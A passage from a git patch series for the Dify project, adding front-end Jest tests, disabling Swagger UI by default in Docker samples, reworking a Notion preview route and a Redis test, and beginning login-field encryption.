}) + }) + + it('should render step instructions', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + expect(screen.getByText('appOverview.overview.appInfo.customize.way1.step1')).toBeInTheDocument() + expect(screen.getByText('appOverview.overview.appInfo.customize.way1.step2')).toBeInTheDocument() + expect(screen.getByText('appOverview.overview.appInfo.customize.way1.step3')).toBeInTheDocument() + }) + }) + + it('should render environment variables with appId and api_base_url', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + const preElement = screen.getByText(/NEXT_PUBLIC_APP_ID/i).closest('pre') + expect(preElement).toBeInTheDocument() + expect(preElement?.textContent).toContain('NEXT_PUBLIC_APP_ID=\'test-app-id-123\'') + expect(preElement?.textContent).toContain('NEXT_PUBLIC_API_URL=\'https://api.example.com\'') + }) + }) + + it('should render GitHub icon in step 1 button', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert - find the GitHub link and verify it contains an SVG icon + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + expect(githubLink).toBeInTheDocument() + expect(githubLink.querySelector('svg')).toBeInTheDocument() + }) + }) + }) + + // Props tests - verify props are correctly applied + describe('Props', () => { + it('should display correct appId in environment variables', async () => { + // Arrange + const customAppId = 'custom-app-id-456' + const props = { ...defaultProps, appId: customAppId } + + // Act + render() + + // Assert + await waitFor(() => { + const preElement = screen.getByText(/NEXT_PUBLIC_APP_ID/i).closest('pre') + expect(preElement?.textContent).toContain(`NEXT_PUBLIC_APP_ID='${customAppId}'`) + }) + }) + + it('should display correct api_base_url in environment variables', async () => { + // Arrange + const customApiUrl = 'https://custom-api.example.com' + const props = { ...defaultProps, api_base_url: customApiUrl } + + // Act + render() + + // Assert + await waitFor(() => { + const preElement = screen.getByText(/NEXT_PUBLIC_API_URL/i).closest('pre') + expect(preElement?.textContent).toContain(`NEXT_PUBLIC_API_URL='${customApiUrl}'`) + }) + }) + }) + + // Mode-based conditional rendering tests - verify GitHub link changes based on app mode + describe('Mode-based GitHub link', () => { + it('should link to webapp-conversation repo for CHAT mode', async () => { + // Arrange + const props = { ...defaultProps, mode: AppModeEnum.CHAT } + + // Act + render() + + // Assert + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + expect(githubLink).toHaveAttribute('href', 'https://github.com/langgenius/webapp-conversation') + }) + }) + + it('should link to webapp-conversation repo for ADVANCED_CHAT mode', async () => { + // Arrange + const props = { ...defaultProps, mode: AppModeEnum.ADVANCED_CHAT } + + // Act + render() + + // Assert + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + expect(githubLink).toHaveAttribute('href', 'https://github.com/langgenius/webapp-conversation') + }) + }) + + it('should link to webapp-text-generator repo for COMPLETION mode', async () => { + // Arrange + const props = { ...defaultProps, mode: AppModeEnum.COMPLETION } + + // Act + render() + + // Assert + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + expect(githubLink).toHaveAttribute('href', 'https://github.com/langgenius/webapp-text-generator') + }) + }) + + it('should link to webapp-text-generator repo for WORKFLOW mode', async () => { + // Arrange + const props = { ...defaultProps, mode: AppModeEnum.WORKFLOW } + + // Act + render() + + // Assert + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + expect(githubLink).toHaveAttribute('href', 'https://github.com/langgenius/webapp-text-generator') + }) + }) + + it('should link to webapp-text-generator repo for AGENT_CHAT mode', async () => { + // Arrange + const props = { ...defaultProps, mode: AppModeEnum.AGENT_CHAT } + + // Act + render() + + // Assert + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + expect(githubLink).toHaveAttribute('href', 'https://github.com/langgenius/webapp-text-generator') + }) + }) + }) + + // External links tests - verify external links have correct security attributes + describe('External links', () => { + it('should have GitHub repo link that opens in new tab', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + expect(githubLink).toHaveAttribute('target', '_blank') + expect(githubLink).toHaveAttribute('rel', 'noopener noreferrer') + }) + }) + + it('should have Vercel docs link that opens in new tab', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + const vercelLink = screen.getByRole('link', { name: /step2Operation/i }) + expect(vercelLink).toHaveAttribute('href', 'https://vercel.com/docs/concepts/deployments/git/vercel-for-github') + expect(vercelLink).toHaveAttribute('target', '_blank') + expect(vercelLink).toHaveAttribute('rel', 'noopener noreferrer') + }) + }) + }) + + // User interactions tests - verify user actions trigger expected behaviors + describe('User Interactions', () => { + it('should call window.open with doc link when way 2 button is clicked', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + await waitFor(() => { + expect(screen.getByText('appOverview.overview.appInfo.customize.way2.operation')).toBeInTheDocument() + }) + + const way2Button = screen.getByText('appOverview.overview.appInfo.customize.way2.operation').closest('button') + expect(way2Button).toBeInTheDocument() + fireEvent.click(way2Button!) + + // Assert + expect(mockWindowOpen).toHaveBeenCalledTimes(1) + expect(mockWindowOpen).toHaveBeenCalledWith( + expect.stringContaining('/guides/application-publishing/developing-with-apis'), + '_blank', + ) + }) + + it('should call onClose when modal close button is clicked', async () => { + // Arrange + const onClose = jest.fn() + const props = { ...defaultProps, onClose } + + // Act + render() + + // Wait for modal to be fully rendered + await waitFor(() => { + expect(screen.getByText('appOverview.overview.appInfo.customize.title')).toBeInTheDocument() + }) + + // Find the close button by navigating from the heading to the close icon + // The close icon is an SVG inside a sibling div of the title + const heading = screen.getByRole('heading', { name: /customize\.title/i }) + const closeIcon = heading.parentElement!.querySelector('svg') + + // Assert - closeIcon must exist for the test to be valid + expect(closeIcon).toBeInTheDocument() + fireEvent.click(closeIcon!) + expect(onClose).toHaveBeenCalledTimes(1) + }) + }) + + // Edge cases tests - verify component handles boundary conditions + describe('Edge Cases', () => { + it('should handle empty appId', async () => { + // Arrange + const props = { ...defaultProps, appId: '' } + + // Act + render() + + // Assert + await waitFor(() => { + const preElement = screen.getByText(/NEXT_PUBLIC_APP_ID/i).closest('pre') + expect(preElement?.textContent).toContain('NEXT_PUBLIC_APP_ID=\'\'') + }) + }) + + it('should handle empty api_base_url', async () => { + // Arrange + const props = { ...defaultProps, api_base_url: '' } + + // Act + render() + + // Assert + await waitFor(() => { + const preElement = screen.getByText(/NEXT_PUBLIC_API_URL/i).closest('pre') + expect(preElement?.textContent).toContain('NEXT_PUBLIC_API_URL=\'\'') + }) + }) + + it('should handle special characters in appId', async () => { + // Arrange + const specialAppId = 'app-id-with-special-chars_123' + const props = { ...defaultProps, appId: specialAppId } + + // Act + render() + + // Assert + await waitFor(() => { + const preElement = screen.getByText(/NEXT_PUBLIC_APP_ID/i).closest('pre') + expect(preElement?.textContent).toContain(`NEXT_PUBLIC_APP_ID='${specialAppId}'`) + }) + }) + + it('should handle URL with special characters in api_base_url', async () => { + // Arrange + const specialApiUrl = 'https://api.example.com:8080/v1' + const props = { ...defaultProps, api_base_url: specialApiUrl } + + // Act + render() + + // Assert + await waitFor(() => { + const preElement = screen.getByText(/NEXT_PUBLIC_API_URL/i).closest('pre') + expect(preElement?.textContent).toContain(`NEXT_PUBLIC_API_URL='${specialApiUrl}'`) + }) + }) + }) + + // StepNum component tests - verify step number styling + describe('StepNum component', () => { + it('should render step numbers with correct styling class', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert - The StepNum component is the direct container of the text + await waitFor(() => { + const stepNumber1 = screen.getByText('1') + expect(stepNumber1).toHaveClass('rounded-2xl') + }) + }) + }) + + // GithubIcon component tests - verify GitHub icon renders correctly + describe('GithubIcon component', () => { + it('should render GitHub icon SVG within GitHub link button', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert - Find GitHub link and verify it contains an SVG icon with expected class + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + const githubIcon = githubLink.querySelector('svg') + expect(githubIcon).toBeInTheDocument() + expect(githubIcon).toHaveClass('text-text-secondary') + }) + }) + }) +}) diff --git a/web/app/components/app/overview/customize/index.tsx b/web/app/components/app/overview/customize/index.tsx index e440a8cf26..698bc98efd 100644 --- a/web/app/components/app/overview/customize/index.tsx +++ b/web/app/components/app/overview/customize/index.tsx @@ -12,7 +12,6 @@ import Tag from '@/app/components/base/tag' type IShareLinkProps = { isShow: boolean onClose: () => void - linkUrl: string api_base_url: string appId: string mode: AppModeEnum From e5cf0d0bf619abb1afcbada0f89e67674799e229 Mon Sep 17 00:00:00 2001 From: -LAN- Date: Tue, 16 Dec 2025 15:01:51 +0800 Subject: [PATCH 49/68] chore: Disable Swagger UI by default in docker samples (#29723) --- docker/.env.example | 2 +- docker/docker-compose.yaml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/docker/.env.example b/docker/.env.example index 8be75420b1..feca68fa02 100644 --- a/docker/.env.example +++ b/docker/.env.example @@ -1421,7 +1421,7 @@ QUEUE_MONITOR_ALERT_EMAILS= QUEUE_MONITOR_INTERVAL=30 # Swagger UI configuration -SWAGGER_UI_ENABLED=true +SWAGGER_UI_ENABLED=false SWAGGER_UI_PATH=/swagger-ui.html # Whether to encrypt dataset IDs when exporting DSL files (default: true) diff --git a/docker/docker-compose.yaml b/docker/docker-compose.yaml index cc17b2853a..1e50792b6d 100644 --- a/docker/docker-compose.yaml +++ b/docker/docker-compose.yaml @@ -631,7 +631,7 @@ x-shared-env: &shared-api-worker-env QUEUE_MONITOR_THRESHOLD: ${QUEUE_MONITOR_THRESHOLD:-200} QUEUE_MONITOR_ALERT_EMAILS: ${QUEUE_MONITOR_ALERT_EMAILS:-} QUEUE_MONITOR_INTERVAL: ${QUEUE_MONITOR_INTERVAL:-30} - SWAGGER_UI_ENABLED: ${SWAGGER_UI_ENABLED:-true} + SWAGGER_UI_ENABLED: ${SWAGGER_UI_ENABLED:-false} SWAGGER_UI_PATH: ${SWAGGER_UI_PATH:-/swagger-ui.html} DSL_EXPORT_ENCRYPT_DATASET_ID: ${DSL_EXPORT_ENCRYPT_DATASET_ID:-true} DATASET_MAX_SEGMENTS_PER_REQUEST: ${DATASET_MAX_SEGMENTS_PER_REQUEST:-0} From 47cd94ec3e68c4c3b7e8adab2d179096e9b066ff Mon Sep 17 00:00:00 2001 From: Joel Date: Tue, 16 Dec 2025 15:06:53 +0800 Subject: [PATCH 50/68] chore: tests for billings (#29720) --- web/__mocks__/react-i18next.ts | 8 +- .../plans/cloud-plan-item/button.spec.tsx | 50 +++++ .../plans/cloud-plan-item/index.spec.tsx | 188 ++++++++++++++++++ .../plans/cloud-plan-item/list/index.spec.tsx | 30 +++ .../billing/pricing/plans/index.spec.tsx | 87 ++++++++ .../self-hosted-plan-item/button.spec.tsx | 61 ++++++ .../self-hosted-plan-item/index.spec.tsx | 143 +++++++++++++ .../self-hosted-plan-item/list/index.spec.tsx | 25 +++ .../self-hosted-plan-item/list/item.spec.tsx | 12 ++ 9 files changed, 603 insertions(+), 1 deletion(-) create mode 100644 web/app/components/billing/pricing/plans/cloud-plan-item/button.spec.tsx create mode 100644 web/app/components/billing/pricing/plans/cloud-plan-item/index.spec.tsx create mode 100644 web/app/components/billing/pricing/plans/cloud-plan-item/list/index.spec.tsx create mode 100644 web/app/components/billing/pricing/plans/index.spec.tsx create mode 100644 web/app/components/billing/pricing/plans/self-hosted-plan-item/button.spec.tsx create mode 100644 web/app/components/billing/pricing/plans/self-hosted-plan-item/index.spec.tsx create mode 100644 web/app/components/billing/pricing/plans/self-hosted-plan-item/list/index.spec.tsx create mode 100644 web/app/components/billing/pricing/plans/self-hosted-plan-item/list/item.spec.tsx diff --git a/web/__mocks__/react-i18next.ts b/web/__mocks__/react-i18next.ts index b0d22e0cc0..1e3f58927e 100644 --- a/web/__mocks__/react-i18next.ts +++ b/web/__mocks__/react-i18next.ts @@ -19,7 +19,13 @@ */ export const useTranslation = () => ({ - t: (key: string) => key, + t: (key: string, options?: Record) => { + if (options?.returnObjects) + return [`${key}-feature-1`, `${key}-feature-2`] + if (options) + return `${key}:${JSON.stringify(options)}` + return key + }, i18n: { language: 'en', changeLanguage: jest.fn(), diff --git a/web/app/components/billing/pricing/plans/cloud-plan-item/button.spec.tsx b/web/app/components/billing/pricing/plans/cloud-plan-item/button.spec.tsx new file mode 100644 index 0000000000..0c50c80c87 --- /dev/null +++ b/web/app/components/billing/pricing/plans/cloud-plan-item/button.spec.tsx @@ -0,0 +1,50 @@ +import React from 'react' +import { fireEvent, render, screen } from '@testing-library/react' +import Button from './button' +import { Plan } from '../../../type' + +describe('CloudPlanButton', () => { + describe('Disabled state', () => { + test('should disable button and hide arrow when plan is not available', () => { + const handleGetPayUrl = jest.fn() + // Arrange + render( +
- ) } diff --git a/web/app/components/app/overview/apikey-info-panel/apikey-info-panel.test-utils.tsx b/web/app/components/app/overview/apikey-info-panel/apikey-info-panel.test-utils.tsx index 36a1c5a008..1b1e729546 100644 --- a/web/app/components/app/overview/apikey-info-panel/apikey-info-panel.test-utils.tsx +++ b/web/app/components/app/overview/apikey-info-panel/apikey-info-panel.test-utils.tsx @@ -188,15 +188,15 @@ export const interactions = { // Text content keys for assertions export const textKeys = { selfHost: { - titleRow1: 'appOverview.apiKeyInfo.selfHost.title.row1', - titleRow2: 'appOverview.apiKeyInfo.selfHost.title.row2', - setAPIBtn: 'appOverview.apiKeyInfo.setAPIBtn', - tryCloud: 'appOverview.apiKeyInfo.tryCloud', + titleRow1: /appOverview\.apiKeyInfo\.selfHost\.title\.row1/, + titleRow2: /appOverview\.apiKeyInfo\.selfHost\.title\.row2/, + setAPIBtn: /appOverview\.apiKeyInfo\.setAPIBtn/, + tryCloud: /appOverview\.apiKeyInfo\.tryCloud/, }, cloud: { - trialTitle: 'appOverview.apiKeyInfo.cloud.trial.title', + trialTitle: /appOverview\.apiKeyInfo\.cloud\.trial\.title/, trialDescription: /appOverview\.apiKeyInfo\.cloud\.trial\.description/, - setAPIBtn: 'appOverview.apiKeyInfo.setAPIBtn', + setAPIBtn: /appOverview\.apiKeyInfo\.setAPIBtn/, }, } From 0749e6e090c6ca23778d0121f9e7e51c326cf4ee Mon Sep 17 00:00:00 2001 From: -LAN- Date: Tue, 16 Dec 2025 16:35:55 +0800 Subject: [PATCH 54/68] test: Stabilize sharded Redis broadcast multi-subscriber test (#29733) Co-authored-by: autofix-ci[bot] <114827586+autofix-ci[bot]@users.noreply.github.com> --- .../redis/test_sharded_channel.py | 24 ++++++++++++++++--- 1 file changed, 21 insertions(+), 3 deletions(-) diff --git a/api/tests/test_containers_integration_tests/libs/broadcast_channel/redis/test_sharded_channel.py b/api/tests/test_containers_integration_tests/libs/broadcast_channel/redis/test_sharded_channel.py index af60adf1fb..d612e70910 100644 --- a/api/tests/test_containers_integration_tests/libs/broadcast_channel/redis/test_sharded_channel.py +++ b/api/tests/test_containers_integration_tests/libs/broadcast_channel/redis/test_sharded_channel.py @@ -113,16 +113,31 @@ class TestShardedRedisBroadcastChannelIntegration: topic = broadcast_channel.topic(topic_name) producer = topic.as_producer() subscriptions = [topic.subscribe() for _ in range(subscriber_count)] + ready_events = [threading.Event() for _ in range(subscriber_count)] def producer_thread(): - time.sleep(0.2) # Allow all subscribers to connect + deadline = time.time() + 5.0 + for ev in ready_events: + remaining = deadline - time.time() + if remaining <= 0: + break + if not ev.wait(timeout=max(0.0, remaining)): + pytest.fail("subscriber did not become ready before publish deadline") producer.publish(message) time.sleep(0.2) for sub in subscriptions: sub.close() - def consumer_thread(subscription: Subscription) -> list[bytes]: + def consumer_thread(subscription: Subscription, ready_event: threading.Event) -> list[bytes]: received_msgs = [] + # Prime subscription so the underlying Pub/Sub listener thread starts before publishing + try: + _ = subscription.receive(0.01) + except SubscriptionClosedError: + return received_msgs + finally: + ready_event.set() + while True: try: msg = subscription.receive(0.1) @@ -137,7 +152,10 @@ class TestShardedRedisBroadcastChannelIntegration: with ThreadPoolExecutor(max_workers=subscriber_count + 1) as executor: producer_future = executor.submit(producer_thread) - consumer_futures = [executor.submit(consumer_thread, subscription) for subscription in subscriptions] + consumer_futures = [ + executor.submit(consumer_thread, subscription, ready_events[idx]) + for idx, subscription in enumerate(subscriptions) + ] producer_future.result(timeout=10.0) msgs_by_consumers = [] From d2b63df7a12e5115a6104a50edbc6d2a68f8dd8d Mon Sep 17 00:00:00 2001 From: Joel Date: Tue, 16 Dec 2025 16:39:04 +0800 Subject: [PATCH 55/68] chore: tests for components in config (#29739) --- .../cannot-query-dataset.spec.tsx | 22 +++++++++ .../warning-mask/formatting-changed.spec.tsx | 39 ++++++++++++++++ .../warning-mask/has-not-set-api.spec.tsx | 26 +++++++++++ .../base/warning-mask/index.spec.tsx | 25 +++++++++++ .../select-type-item/index.spec.tsx | 45 +++++++++++++++++++ 5 files changed, 157 insertions(+) create mode 100644 web/app/components/app/configuration/base/warning-mask/cannot-query-dataset.spec.tsx create mode 100644 web/app/components/app/configuration/base/warning-mask/formatting-changed.spec.tsx create mode 100644 web/app/components/app/configuration/base/warning-mask/has-not-set-api.spec.tsx create mode 100644 web/app/components/app/configuration/base/warning-mask/index.spec.tsx create mode 100644 web/app/components/app/configuration/config-var/select-type-item/index.spec.tsx diff --git a/web/app/components/app/configuration/base/warning-mask/cannot-query-dataset.spec.tsx b/web/app/components/app/configuration/base/warning-mask/cannot-query-dataset.spec.tsx new file mode 100644 index 0000000000..d625e9fb72 --- /dev/null +++ b/web/app/components/app/configuration/base/warning-mask/cannot-query-dataset.spec.tsx @@ -0,0 +1,22 @@ +import React from 'react' +import { fireEvent, render, screen } from '@testing-library/react' +import CannotQueryDataset from './cannot-query-dataset' + +describe('CannotQueryDataset WarningMask', () => { + test('should render dataset warning copy and action button', () => { + const onConfirm = jest.fn() + render() + + expect(screen.getByText('appDebug.feature.dataSet.queryVariable.unableToQueryDataSet')).toBeInTheDocument() + expect(screen.getByText('appDebug.feature.dataSet.queryVariable.unableToQueryDataSetTip')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'appDebug.feature.dataSet.queryVariable.ok' })).toBeInTheDocument() + }) + + test('should invoke onConfirm when OK button clicked', () => { + const onConfirm = jest.fn() + render() + + fireEvent.click(screen.getByRole('button', { name: 'appDebug.feature.dataSet.queryVariable.ok' })) + expect(onConfirm).toHaveBeenCalledTimes(1) + }) +}) diff --git a/web/app/components/app/configuration/base/warning-mask/formatting-changed.spec.tsx b/web/app/components/app/configuration/base/warning-mask/formatting-changed.spec.tsx new file mode 100644 index 0000000000..a968bde272 --- /dev/null +++ b/web/app/components/app/configuration/base/warning-mask/formatting-changed.spec.tsx @@ -0,0 +1,39 @@ +import React from 'react' +import { fireEvent, render, screen } from '@testing-library/react' +import FormattingChanged from './formatting-changed' + +describe('FormattingChanged WarningMask', () => { + test('should display translation text and both actions', () => { + const onConfirm = jest.fn() + const onCancel = jest.fn() + + render( + , + ) + + expect(screen.getByText('appDebug.formattingChangedTitle')).toBeInTheDocument() + expect(screen.getByText('appDebug.formattingChangedText')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'common.operation.cancel' })).toBeInTheDocument() + expect(screen.getByRole('button', { name: /common\.operation\.refresh/ })).toBeInTheDocument() + }) + + test('should call callbacks when buttons are clicked', () => { + const onConfirm = jest.fn() + const onCancel = jest.fn() + render( + , + ) + + fireEvent.click(screen.getByRole('button', { name: /common\.operation\.refresh/ })) + fireEvent.click(screen.getByRole('button', { name: 'common.operation.cancel' })) + + expect(onConfirm).toHaveBeenCalledTimes(1) + expect(onCancel).toHaveBeenCalledTimes(1) + }) +}) diff --git a/web/app/components/app/configuration/base/warning-mask/has-not-set-api.spec.tsx b/web/app/components/app/configuration/base/warning-mask/has-not-set-api.spec.tsx new file mode 100644 index 0000000000..46608374da --- /dev/null +++ b/web/app/components/app/configuration/base/warning-mask/has-not-set-api.spec.tsx @@ -0,0 +1,26 @@ +import React from 'react' +import { fireEvent, render, screen } from '@testing-library/react' +import HasNotSetAPI from './has-not-set-api' + +describe('HasNotSetAPI WarningMask', () => { + test('should show default title when trial not finished', () => { + render() + + expect(screen.getByText('appDebug.notSetAPIKey.title')).toBeInTheDocument() + expect(screen.getByText('appDebug.notSetAPIKey.description')).toBeInTheDocument() + }) + + test('should show trail finished title when flag is true', () => { + render() + + expect(screen.getByText('appDebug.notSetAPIKey.trailFinished')).toBeInTheDocument() + }) + + test('should call onSetting when primary button clicked', () => { + const onSetting = jest.fn() + render() + + fireEvent.click(screen.getByRole('button', { name: 'appDebug.notSetAPIKey.settingBtn' })) + expect(onSetting).toHaveBeenCalledTimes(1) + }) +}) diff --git a/web/app/components/app/configuration/base/warning-mask/index.spec.tsx b/web/app/components/app/configuration/base/warning-mask/index.spec.tsx new file mode 100644 index 0000000000..6d533a423d --- /dev/null +++ b/web/app/components/app/configuration/base/warning-mask/index.spec.tsx @@ -0,0 +1,25 @@ +import React from 'react' +import { render, screen } from '@testing-library/react' +import WarningMask from './index' + +describe('WarningMask', () => { + // Rendering of title, description, and footer content + describe('Rendering', () => { + test('should display provided title, description, and footer node', () => { + const footer = + // Arrange + render( + , + ) + + // Assert + expect(screen.getByText('Access Restricted')).toBeInTheDocument() + expect(screen.getByText('Only workspace owners may modify this section.')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'Retry' })).toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/app/configuration/config-var/select-type-item/index.spec.tsx b/web/app/components/app/configuration/config-var/select-type-item/index.spec.tsx new file mode 100644 index 0000000000..469164e607 --- /dev/null +++ b/web/app/components/app/configuration/config-var/select-type-item/index.spec.tsx @@ -0,0 +1,45 @@ +import React from 'react' +import { fireEvent, render, screen } from '@testing-library/react' +import SelectTypeItem from './index' +import { InputVarType } from '@/app/components/workflow/types' + +describe('SelectTypeItem', () => { + // Rendering pathways based on type and selection state + describe('Rendering', () => { + test('should render ok', () => { + // Arrange + const { container } = render( + , + ) + + // Assert + expect(screen.getByText('appDebug.variableConfig.text-input')).toBeInTheDocument() + expect(container.querySelector('svg')).not.toBeNull() + }) + }) + + // User interaction outcomes + describe('Interactions', () => { + test('should trigger onClick when item is pressed', () => { + const handleClick = jest.fn() + // Arrange + render( + , + ) + + // Act + fireEvent.click(screen.getByText('appDebug.variableConfig.paragraph')) + + // Assert + expect(handleClick).toHaveBeenCalledTimes(1) + }) + }) +}) From ae4a9040dfd344fa0888a23dfd9813ad25284def Mon Sep 17 00:00:00 2001 From: Jyong <76649700+JohnJyong@users.noreply.github.com> Date: Tue, 16 Dec 2025 16:43:45 +0800 Subject: [PATCH 56/68] Feat/update notion preview (#29345) Co-authored-by: twwu --- api/controllers/console/datasets/data_source.py | 7 +++---- api/core/rag/extractor/entity/extract_setting.py | 2 +- api/core/rag/extractor/extract_processor.py | 2 +- .../datasets/create/notion-page-preview/index.tsx | 1 - web/service/datasets.ts | 4 ++-- 5 files changed, 7 insertions(+), 9 deletions(-) diff --git a/api/controllers/console/datasets/data_source.py b/api/controllers/console/datasets/data_source.py index 01f268d94d..95399fad13 100644 --- a/api/controllers/console/datasets/data_source.py +++ b/api/controllers/console/datasets/data_source.py @@ -218,14 +218,14 @@ class DataSourceNotionListApi(Resource): @console_ns.route( - "/notion/workspaces//pages///preview", + "/notion/pages///preview", "/datasets/notion-indexing-estimate", ) class DataSourceNotionApi(Resource): @setup_required @login_required @account_initialization_required - def get(self, workspace_id, page_id, page_type): + def get(self, page_id, page_type): _, current_tenant_id = current_account_with_tenant() credential_id = request.args.get("credential_id", default=None, type=str) @@ -239,11 +239,10 @@ class DataSourceNotionApi(Resource): plugin_id="langgenius/notion_datasource", ) - workspace_id = str(workspace_id) page_id = str(page_id) extractor = NotionExtractor( - notion_workspace_id=workspace_id, + notion_workspace_id="", notion_obj_id=page_id, notion_page_type=page_type, notion_access_token=credential.get("integration_secret"), diff --git a/api/core/rag/extractor/entity/extract_setting.py b/api/core/rag/extractor/entity/extract_setting.py index c3bfbce98f..0c42034073 100644 --- a/api/core/rag/extractor/entity/extract_setting.py +++ b/api/core/rag/extractor/entity/extract_setting.py @@ -10,7 +10,7 @@ class NotionInfo(BaseModel): """ credential_id: str | None = None - notion_workspace_id: str + notion_workspace_id: str | None = "" notion_obj_id: str notion_page_type: str document: Document | None = None diff --git a/api/core/rag/extractor/extract_processor.py b/api/core/rag/extractor/extract_processor.py index 0f62f9c4b6..013c287248 100644 --- a/api/core/rag/extractor/extract_processor.py +++ b/api/core/rag/extractor/extract_processor.py @@ -166,7 +166,7 @@ class ExtractProcessor: elif extract_setting.datasource_type == DatasourceType.NOTION: assert extract_setting.notion_info is not None, "notion_info is required" extractor = NotionExtractor( - notion_workspace_id=extract_setting.notion_info.notion_workspace_id, + notion_workspace_id=extract_setting.notion_info.notion_workspace_id or "", notion_obj_id=extract_setting.notion_info.notion_obj_id, notion_page_type=extract_setting.notion_info.notion_page_type, document_model=extract_setting.notion_info.document, diff --git a/web/app/components/datasets/create/notion-page-preview/index.tsx b/web/app/components/datasets/create/notion-page-preview/index.tsx index 000b84ac62..edbee2b194 100644 --- a/web/app/components/datasets/create/notion-page-preview/index.tsx +++ b/web/app/components/datasets/create/notion-page-preview/index.tsx @@ -29,7 +29,6 @@ const NotionPagePreview = ({ return try { const res = await fetchNotionPagePreview({ - workspaceID: currentPage.workspace_id, pageID: currentPage.page_id, pageType: currentPage.type, credentialID: notionCredentialId, diff --git a/web/service/datasets.ts b/web/service/datasets.ts index 624da433f8..8791a61b7c 100644 --- a/web/service/datasets.ts +++ b/web/service/datasets.ts @@ -185,8 +185,8 @@ export const fetchFileIndexingEstimate = (body: IndexingEstimateParams): Promise return post('/datasets/indexing-estimate', { body }) } -export const fetchNotionPagePreview = ({ workspaceID, pageID, pageType, credentialID }: { workspaceID: string; pageID: string; pageType: string; credentialID: string }): Promise<{ content: string }> => { - return get<{ content: string }>(`notion/workspaces/${workspaceID}/pages/${pageID}/${pageType}/preview`, { +export const fetchNotionPagePreview = ({ pageID, pageType, credentialID }: { pageID: string; pageType: string; credentialID: string }): Promise<{ content: string }> => { + return get<{ content: string }>(`notion/pages/${pageID}/${pageType}/preview`, { params: { credential_id: credentialID, }, From b7649f61f842ce8c39c923f3898f8912450b7095 Mon Sep 17 00:00:00 2001 From: zyssyz123 <916125788@qq.com> Date: Tue, 16 Dec 2025 16:55:51 +0800 Subject: [PATCH 57/68] fix: Login secret text transmission (#29659) Co-authored-by: autofix-ci[bot] <114827586+autofix-ci[bot]@users.noreply.github.com> Co-authored-by: gemini-code-assist[bot] <176961590+gemini-code-assist[bot]@users.noreply.github.com> Co-authored-by: Copilot Autofix powered by AI <62310815+github-advanced-security[bot]@users.noreply.github.com> Co-authored-by: Joel Co-authored-by: -LAN- --- api/.env.example | 2 +- api/controllers/console/auth/login.py | 9 +- api/controllers/console/wraps.py | 82 ++++++++++ api/libs/encryption.py | 66 ++++++++ .../auth/test_authentication_security.py | 18 ++- .../console/auth/test_email_verification.py | 25 ++- .../console/auth/test_login_logout.py | 32 +++- api/tests/unit_tests/libs/test_encryption.py | 150 ++++++++++++++++++ docker/.env.example | 2 +- web/app/signin/check-code/page.tsx | 3 +- .../components/mail-and-password-auth.tsx | 3 +- web/docker/entrypoint.sh | 1 + web/package.json | 2 +- web/utils/encryption.ts | 46 ++++++ 14 files changed, 417 insertions(+), 24 deletions(-) create mode 100644 api/libs/encryption.py create mode 100644 api/tests/unit_tests/libs/test_encryption.py create mode 100644 web/utils/encryption.ts diff --git a/api/.env.example b/api/.env.example index ace4c4ea1b..4806429972 100644 --- a/api/.env.example +++ b/api/.env.example @@ -670,4 +670,4 @@ ANNOTATION_IMPORT_MIN_RECORDS=1 ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE=5 ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR=20 # Maximum number of concurrent annotation import tasks per tenant -ANNOTATION_IMPORT_MAX_CONCURRENT=5 \ No newline at end of file +ANNOTATION_IMPORT_MAX_CONCURRENT=5 diff --git a/api/controllers/console/auth/login.py b/api/controllers/console/auth/login.py index f486f4c313..772d98822e 100644 --- a/api/controllers/console/auth/login.py +++ b/api/controllers/console/auth/login.py @@ -22,7 +22,12 @@ from controllers.console.error import ( NotAllowedCreateWorkspace, WorkspacesLimitExceeded, ) -from controllers.console.wraps import email_password_login_enabled, setup_required +from controllers.console.wraps import ( + decrypt_code_field, + decrypt_password_field, + email_password_login_enabled, + setup_required, +) from events.tenant_event import tenant_was_created from libs.helper import EmailStr, extract_remote_ip from libs.login import current_account_with_tenant @@ -79,6 +84,7 @@ class LoginApi(Resource): @setup_required @email_password_login_enabled @console_ns.expect(console_ns.models[LoginPayload.__name__]) + @decrypt_password_field def post(self): """Authenticate user and login.""" args = LoginPayload.model_validate(console_ns.payload) @@ -218,6 +224,7 @@ class EmailCodeLoginSendEmailApi(Resource): class EmailCodeLoginApi(Resource): @setup_required @console_ns.expect(console_ns.models[EmailCodeLoginPayload.__name__]) + @decrypt_code_field def post(self): args = EmailCodeLoginPayload.model_validate(console_ns.payload) diff --git a/api/controllers/console/wraps.py b/api/controllers/console/wraps.py index 4654650c77..95fc006a12 100644 --- a/api/controllers/console/wraps.py +++ b/api/controllers/console/wraps.py @@ -9,10 +9,12 @@ from typing import ParamSpec, TypeVar from flask import abort, request from configs import dify_config +from controllers.console.auth.error import AuthenticationFailedError, EmailCodeError from controllers.console.workspace.error import AccountNotInitializedError from enums.cloud_plan import CloudPlan from extensions.ext_database import db from extensions.ext_redis import redis_client +from libs.encryption import FieldEncryption from libs.login import current_account_with_tenant from models.account import AccountStatus from models.dataset import RateLimitLog @@ -25,6 +27,14 @@ from .error import NotInitValidateError, 